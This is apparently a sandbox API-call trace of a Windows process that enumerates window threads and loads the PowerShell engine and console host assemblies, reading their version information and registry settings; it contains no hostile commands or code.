	[0851.804] GetWindowThreadProcessId (in: hWnd=0x10470, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0xffc
	[0851.804] GetWindowThreadProcessId (in: hWnd=0x10460, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0xf74
	[0851.805] GetWindowThreadProcessId (in: hWnd=0x1044e, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0xf08
	[0851.805] GetWindowThreadProcessId (in: hWnd=0x10442, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0xf0c
	[0851.805] GetWindowThreadProcessId (in: hWnd=0x1043a, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0xed8
	[0851.805] GetWindowThreadProcessId (in: hWnd=0x10436, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0xe90
	[0851.805] GetWindowThreadProcessId (in: hWnd=0x10432, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0xea8
	[0851.805] GetWindowThreadProcessId (in: hWnd=0x10416, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0xfa8
	[0851.805] GetWindowThreadProcessId (in: hWnd=0x10412, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0xfbc
	[0851.805] GetWindowThreadProcessId (in: hWnd=0x1040e, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0xfb8
	[0851.805] GetWindowThreadProcessId (in: hWnd=0x1040a, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0xfb4
	[0851.806] GetWindowThreadProcessId (in: hWnd=0x10406, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0xfb0
	[0851.806] GetWindowThreadProcessId (in: hWnd=0x10402, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0xfac
	[0851.806] GetWindowThreadProcessId (in: hWnd=0x103fe, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0xfc0
	[0851.806] GetWindowThreadProcessId (in: hWnd=0x103f0, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0xfd0
	[0851.806] GetWindowThreadProcessId (in: hWnd=0x1039a, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0xf88
	[0851.806] GetWindowThreadProcessId (in: hWnd=0x1038a, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0xf84
	[0851.806] GetWindowThreadProcessId (in: hWnd=0x10382, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0xf80
	[0851.806] GetWindowThreadProcessId (in: hWnd=0x1036e, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0xde0
	[0851.807] GetWindowThreadProcessId (in: hWnd=0x1036a, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0xddc
	[0851.807] GetWindowThreadProcessId (in: hWnd=0x10366, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0xdd8
	[0851.807] GetWindowThreadProcessId (in: hWnd=0x10360, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0xd34
	[0851.807] GetWindowThreadProcessId (in: hWnd=0x10358, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0xd10
	[0851.807] GetWindowThreadProcessId (in: hWnd=0x20276, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0xd0c
	[0851.807] GetWindowThreadProcessId (in: hWnd=0x800a4, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0xc9c
	[0851.807] GetWindowThreadProcessId (in: hWnd=0x10346, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0xc74
	[0851.807] GetWindowThreadProcessId (in: hWnd=0x1032c, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0xc1c
	[0851.808] GetWindowThreadProcessId (in: hWnd=0x10318, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0xc08
	[0851.808] GetWindowThreadProcessId (in: hWnd=0x102fa, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0xabc
	[0851.808] GetWindowThreadProcessId (in: hWnd=0x102e0, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x24c
	[0851.808] GetWindowThreadProcessId (in: hWnd=0x102dc, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0xbb0
	[0851.808] GetWindowThreadProcessId (in: hWnd=0x102d2, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0xbfc
	[0851.808] GetWindowThreadProcessId (in: hWnd=0x102ce, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0xb10
	[0851.808] GetWindowThreadProcessId (in: hWnd=0x102ca, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x374
	[0851.808] GetWindowThreadProcessId (in: hWnd=0x102c6, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x368
	[0851.808] GetWindowThreadProcessId (in: hWnd=0x102c2, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0xb28
	[0851.809] GetWindowThreadProcessId (in: hWnd=0x102be, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0xae8
	[0851.809] GetWindowThreadProcessId (in: hWnd=0x102b2, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0xb14
	[0851.809] GetWindowThreadProcessId (in: hWnd=0x102ae, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x95c
	[0851.809] GetWindowThreadProcessId (in: hWnd=0x102aa, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0xa8c
	[0851.809] GetWindowThreadProcessId (in: hWnd=0x202a0, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x46c
	[0851.809] GetWindowThreadProcessId (in: hWnd=0x10264, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0xb3c
	[0851.809] GetWindowThreadProcessId (in: hWnd=0x10254, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0xa90
	[0851.809] GetWindowThreadProcessId (in: hWnd=0x10244, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0xad0
	[0851.810] GetWindowThreadProcessId (in: hWnd=0x1022a, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0xa9c
	[0851.810] GetWindowThreadProcessId (in: hWnd=0x10226, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0xaa0
	[0851.810] GetWindowThreadProcessId (in: hWnd=0x10222, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0xb1c
	[0851.810] GetWindowThreadProcessId (in: hWnd=0x1021e, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x7e0
	[0851.810] GetWindowThreadProcessId (in: hWnd=0x10216, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0xa74
	[0851.810] GetWindowThreadProcessId (in: hWnd=0x20208, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x694
	[0851.810] GetWindowThreadProcessId (in: hWnd=0x401f0, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0xa28
	[0851.811] GetWindowThreadProcessId (in: hWnd=0x1020c, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x9b0
	[0851.811] GetWindowThreadProcessId (in: hWnd=0x10202, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x8d8
	[0851.811] GetWindowThreadProcessId (in: hWnd=0x201ca, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x940
	[0851.811] GetWindowThreadProcessId (in: hWnd=0x201d8, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x93c
	[0851.811] GetWindowThreadProcessId (in: hWnd=0x301e2, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x4ec
	[0851.811] GetWindowThreadProcessId (in: hWnd=0x201de, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x150
	[0851.811] GetWindowThreadProcessId (in: hWnd=0x201c8, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x720
	[0851.811] GetWindowThreadProcessId (in: hWnd=0x301f4, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x3c4
	[0851.811] GetWindowThreadProcessId (in: hWnd=0x301c0, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x7d4
	[0851.812] GetWindowThreadProcessId (in: hWnd=0x301c4, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x6c8
	[0851.812] GetWindowThreadProcessId (in: hWnd=0x4011e, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0xb54
	[0851.812] GetWindowThreadProcessId (in: hWnd=0x50122, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0xb54
	[0851.812] GetWindowThreadProcessId (in: hWnd=0x108f8, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x6bc
	[0851.812] GetWindowThreadProcessId (in: hWnd=0x501b8, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0xb5c
	[0851.815] WerSetFlags () returned 0x0
	[0853.860] SetThreadPreferredUILanguages (in: dwFlags=0x100, pwszLanguagesBuffer=0x0, pulNumLanguages=0x0 | out: pulNumLanguages=0x0) returned 1
	[0853.860] CoTaskMemFree (pv=0x0) 
	[0853.861] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0xeda88, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0xeda80 | out: pulNumLanguages=0xeda88, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0xeda80) returned 1
	[0853.862] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0xeda88, pwszLanguagesBuffer=0x2cc5d60, pcchLanguagesBuffer=0xeda80 | out: pulNumLanguages=0xeda88, pwszLanguagesBuffer=0x2cc5d60, pcchLanguagesBuffer=0xeda80) returned 1
	[0853.868] CoTaskMemAlloc (cb=0x24) returned 0x301460
	[0853.868] GetUserDefaultLocaleName (in: lpLocaleName=0x301460, cchLocaleName=16 | out: lpLocaleName="en-US") returned 6
	[0853.869] CoTaskMemFree (pv=0x301460) 
	[0853.897] CoTaskMemAlloc (cb=0x104) returned 0x303870
	[0853.897] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x303870, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0853.897] CoTaskMemFree (pv=0x303870) 
	[0853.900] CoTaskMemAlloc (cb=0x104) returned 0x303870
	[0853.900] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x303870, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0853.900] CoTaskMemFree (pv=0x303870) 
	[0854.948] CoTaskMemAlloc (cb=0x104) returned 0x303870
	[0854.948] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x303870, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0854.948] CoTaskMemFree (pv=0x303870) 
	[0854.958] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xed450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0854.958] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xed4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0854.958] SetErrorMode (uMode=0x1) returned 0x1
	[0854.958] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0xed700 | out: lpFileInformation=0xed700*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0854.959] SetErrorMode (uMode=0x1) returned 0x1
	[0854.959] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0xed970 | out: lpdwHandle=0xed970) returned 0x94c
	[0854.960] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2cc95f0 | out: lpData=0x2cc95f0) returned 1
	[0854.961] VerQueryValueW (in: pBlock=0x2cc95f0, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0xed8e8, puLen=0xed8e0 | out: lplpBuffer=0xed8e8*=0x2cc968c, puLen=0xed8e0) returned 1
	[0854.961] VerQueryValueW (in: pBlock=0x2cc95f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0xed858, puLen=0xed850 | out: lplpBuffer=0xed858*=0x2cc9768, puLen=0xed850) returned 1
	[0854.961] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0854.961] CoTaskMemAlloc (cb=0x2e) returned 0x2fc210
	[0854.961] lstrcpyW (in: lpString1=0x2fc210, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0854.961] CoTaskMemFree (pv=0x2fc210) 
	[0854.961] VerQueryValueW (in: pBlock=0x2cc95f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0xed858, puLen=0xed850 | out: lplpBuffer=0xed858*=0x2cc97bc, puLen=0xed850) returned 1
	[0854.961] lstrlenW (lpString="System.Management.Automation") returned 28
	[0854.961] CoTaskMemAlloc (cb=0x3c) returned 0x278da0
	[0854.962] lstrcpyW (in: lpString1=0x278da0, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0854.962] CoTaskMemFree (pv=0x278da0) 
	[0854.962] VerQueryValueW (in: pBlock=0x2cc95f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0xed858, puLen=0xed850 | out: lplpBuffer=0xed858*=0x2cc9818, puLen=0xed850) returned 1
	[0854.962] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0854.962] CoTaskMemAlloc (cb=0x20) returned 0x3014c0
	[0854.962] lstrcpyW (in: lpString1=0x3014c0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0854.962] CoTaskMemFree (pv=0x3014c0) 
	[0854.962] VerQueryValueW (in: pBlock=0x2cc95f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0xed858, puLen=0xed850 | out: lplpBuffer=0xed858*=0x2cc9858, puLen=0xed850) returned 1
	[0854.962] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0854.962] CoTaskMemAlloc (cb=0x44) returned 0x278da0
	[0854.962] lstrcpyW (in: lpString1=0x278da0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0854.962] CoTaskMemFree (pv=0x278da0) 
	[0854.962] VerQueryValueW (in: pBlock=0x2cc95f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0xed858, puLen=0xed850 | out: lplpBuffer=0xed858*=0x2cc98c0, puLen=0xed850) returned 1
	[0854.962] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0854.962] CoTaskMemAlloc (cb=0x76) returned 0x29eaf0
	[0854.962] lstrcpyW (in: lpString1=0x29eaf0, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0854.962] CoTaskMemFree (pv=0x29eaf0) 
	[0854.962] VerQueryValueW (in: pBlock=0x2cc95f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0xed858, puLen=0xed850 | out: lplpBuffer=0xed858*=0x2cc995c, puLen=0xed850) returned 1
	[0854.962] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0854.962] CoTaskMemAlloc (cb=0x44) returned 0x278da0
	[0854.962] lstrcpyW (in: lpString1=0x278da0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0854.962] CoTaskMemFree (pv=0x278da0) 
	[0854.962] VerQueryValueW (in: pBlock=0x2cc95f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0xed858, puLen=0xed850 | out: lplpBuffer=0xed858*=0x2cc99c0, puLen=0xed850) returned 1
	[0854.962] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0854.962] CoTaskMemAlloc (cb=0x58) returned 0x2c0f80
	[0854.962] lstrcpyW (in: lpString1=0x2c0f80, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0854.962] CoTaskMemFree (pv=0x2c0f80) 
	[0854.962] VerQueryValueW (in: pBlock=0x2cc95f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0xed858, puLen=0xed850 | out: lplpBuffer=0xed858*=0x2cc9a3c, puLen=0xed850) returned 1
	[0854.962] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0854.962] CoTaskMemAlloc (cb=0x20) returned 0x3014c0
	[0854.963] lstrcpyW (in: lpString1=0x3014c0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0854.963] CoTaskMemFree (pv=0x3014c0) 
	[0854.963] VerQueryValueW (in: pBlock=0x2cc95f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0xed858, puLen=0xed850 | out: lplpBuffer=0xed858*=0x2cc96e4, puLen=0xed850) returned 1
	[0854.963] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0854.963] CoTaskMemAlloc (cb=0x66) returned 0x300210
	[0854.963] lstrcpyW (in: lpString1=0x300210, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0854.963] CoTaskMemFree (pv=0x300210) 
	[0854.963] VerQueryValueW (in: pBlock=0x2cc95f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0xed858, puLen=0xed850 | out: lplpBuffer=0xed858*=0x0, puLen=0xed850) returned 0
	[0854.963] VerQueryValueW (in: pBlock=0x2cc95f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0xed858, puLen=0xed850 | out: lplpBuffer=0xed858*=0x0, puLen=0xed850) returned 0
	[0854.963] VerQueryValueW (in: pBlock=0x2cc95f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0xed858, puLen=0xed850 | out: lplpBuffer=0xed858*=0x0, puLen=0xed850) returned 0
	[0854.963] VerQueryValueW (in: pBlock=0x2cc95f0, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0xed828, puLen=0xed820 | out: lplpBuffer=0xed828*=0x2cc968c, puLen=0xed820) returned 1
	[0854.963] CoTaskMemAlloc (cb=0x204) returned 0x2a17a0
	[0854.963] VerLanguageNameW (in: wLang=0x0, szLang=0x2a17a0, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0854.963] CoTaskMemFree (pv=0x2a17a0) 
	[0854.963] VerQueryValueW (in: pBlock=0x2cc95f0, lpSubBlock="\\", lplpBuffer=0xed878, puLen=0xed870 | out: lplpBuffer=0xed878*=0x2cc9618, puLen=0xed870) returned 1
	[0854.971] CoTaskMemAlloc (cb=0x104) returned 0x303870
	[0854.971] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x303870, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0854.971] CoTaskMemFree (pv=0x303870) 
	[0854.973] CoTaskMemAlloc (cb=0x104) returned 0x303870
	[0854.973] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x303870, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0854.973] CoTaskMemFree (pv=0x303870) 
	[0854.980] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xed748 | out: phkResult=0xed748*=0x2e8) returned 0x0
	[0854.981] RegOpenKeyExW (in: hKey=0x2e8, lpSubKey="1", ulOptions=0x0, samDesired=0x20019, phkResult=0xed738 | out: phkResult=0xed738*=0x2ec) returned 0x0
	[0854.981] RegOpenKeyExW (in: hKey=0x2ec, lpSubKey="PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xed7c8 | out: phkResult=0xed7c8*=0x2f0) returned 0x0
	[0854.984] RegQueryValueExW (in: hKey=0x2f0, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xed70c, lpData=0x0, lpcbData=0xed708*=0x0 | out: lpType=0xed70c*=0x1, lpData=0x0, lpcbData=0xed708*=0x56) returned 0x0
	[0854.985] CoTaskMemAlloc (cb=0x5a) returned 0x3001a0
	[0854.985] RegQueryValueExW (in: hKey=0x2f0, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xed6dc, lpData=0x3001a0, lpcbData=0xed6d8*=0x56 | out: lpType=0xed6dc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xed6d8*=0x56) returned 0x0
	[0854.985] CoTaskMemFree (pv=0x3001a0) 
	[0854.988] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xed260, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0856.216] CoTaskMemAlloc (cb=0x104) returned 0x303870
	[0856.216] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x303870, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0856.216] CoTaskMemFree (pv=0x303870) 
	[0859.385] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0xed300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0859.385] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0xed300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0863.579] CoTaskMemAlloc (cb=0x104) returned 0x312c50
	[0863.579] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x312c50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0863.579] CoTaskMemFree (pv=0x312c50) 
	[0863.580] CoTaskMemAlloc (cb=0x104) returned 0x312c50
	[0863.580] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x312c50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0863.580] CoTaskMemFree (pv=0x312c50) 
	[0865.871] CoTaskMemAlloc (cb=0x104) returned 0x312c50
	[0865.871] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x312c50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0865.871] CoTaskMemFree (pv=0x312c50) 
	[0865.871] CoTaskMemAlloc (cb=0x104) returned 0x312c50
	[0865.871] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x312c50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0865.871] CoTaskMemFree (pv=0x312c50) 
	[0865.872] CoTaskMemAlloc (cb=0x104) returned 0x312c50
	[0865.872] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x312c50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0865.872] CoTaskMemFree (pv=0x312c50) 
	[0872.264] CoTaskMemAlloc (cb=0x104) returned 0x303870
	[0872.264] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x303870, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0872.264] CoTaskMemFree (pv=0x303870) 
	[0872.267] CoTaskMemAlloc (cb=0x104) returned 0x303870
	[0872.267] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x303870, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0872.267] CoTaskMemFree (pv=0x303870) 
	[0874.119] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xed300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0874.119] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xed300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0926.639] CoTaskMemAlloc (cb=0x104) returned 0x1b7b02d0
	[0926.639] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7b02d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0926.640] CoTaskMemFree (pv=0x1b7b02d0) 
	[0926.641] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xed500, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0926.642] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xed450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0926.642] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xed450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
